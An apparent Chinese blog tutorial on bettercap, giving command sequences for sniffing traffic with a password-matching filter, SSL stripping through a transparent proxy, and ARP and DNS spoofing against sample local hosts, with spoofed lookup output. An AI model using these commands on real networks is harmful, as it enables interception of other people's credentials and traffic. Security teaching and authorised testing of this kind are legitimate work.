使用bettercap进行数据包嗅探技术,学习,新花样,大神操作

By admin

2019-09-10 21:12:15

浏览量40

已赞0

使用bettercap进行数据包嗅探

bettercap是一个强大的、容易扩展和便携式框架编写的旨在提供安全研究人员,红队一个易于使用的、一体化的解决方案,具备他们可能需要的所有功能,以执行侦察和攻击WiFi网络扫描、蓝牙低功耗设备扫描,特征枚举,读写、无被动和主动IP网络主机探测和侦察、网络嗅探器、端口扫描
Kali Linux上可以通过apt install bettercap直接安装

使用bettercap进行数据包嗅探

查看api.rest模块的帮助

使用bettercap进行数据包嗅探

get * 查看变量值

使用bettercap进行数据包嗅探

net.sniff on   启动数据包嗅探器
net.sniff off   停止数据包嗅探器
net.sniff stats   打印数据包嗅探器会话配置和统计信息
net.fuzz on   为包含指定图层的每个嗅探数据包启用模糊测试
net.fuzz off   禁用模糊测试

使用bettercap进行数据包嗅探

set net.sniff.filter 'not arp'
set net.sniff.local true
set net.sniff.regexp '.*password=. '
get net.sniff.*
net.sniff on

使用bettercap进行数据包嗅探

使用bettercap进行数据包嗅探

透明HTTP(S)代理
set http.proxy.sslstrip true
set net.sniff.verbose false
set arp.spoof.targets 192.168.190.3
arp.spoof on
http.proxy on
net.sniff on
DNS欺骗
set dns.spoof.domains <domain1>,<domain2>,...
set dns.spoof.address <Target address>
欺骗整个子网:set dns.spoof.all true
dns.spoof on
ARP欺骗
arp.spoof off
set arp.spoof.targets 192.168.190.3
arp.spoof on
DNS/ARP欺骗
get dns.spoof.*     

dns.spoof.address: '192.168.1.3'

dns.spoof.all: 'false'

dns.spoof.domains: ': time.com'
get dns.spoof.*

arp.spoof.internal: 'true'

arp.spoof.targets: '192.168.1.6'

arp.spoof.whitelist: ''
C:> nslookup time.com
服务器:csp1.zte.com.cn
地址:192.168.1.1
非权威答案:
名称:time.com
地址:192.168.1.3(Spoofed)
192.168.1.3(欺骗)
小伙伴们自行研究吧。

发表评论
拖动滑块验证
»
请先 注册/登录 后参与评论

已有0 发布

默认   热门   正序   倒序
    查看更多评论
    已有0次打赏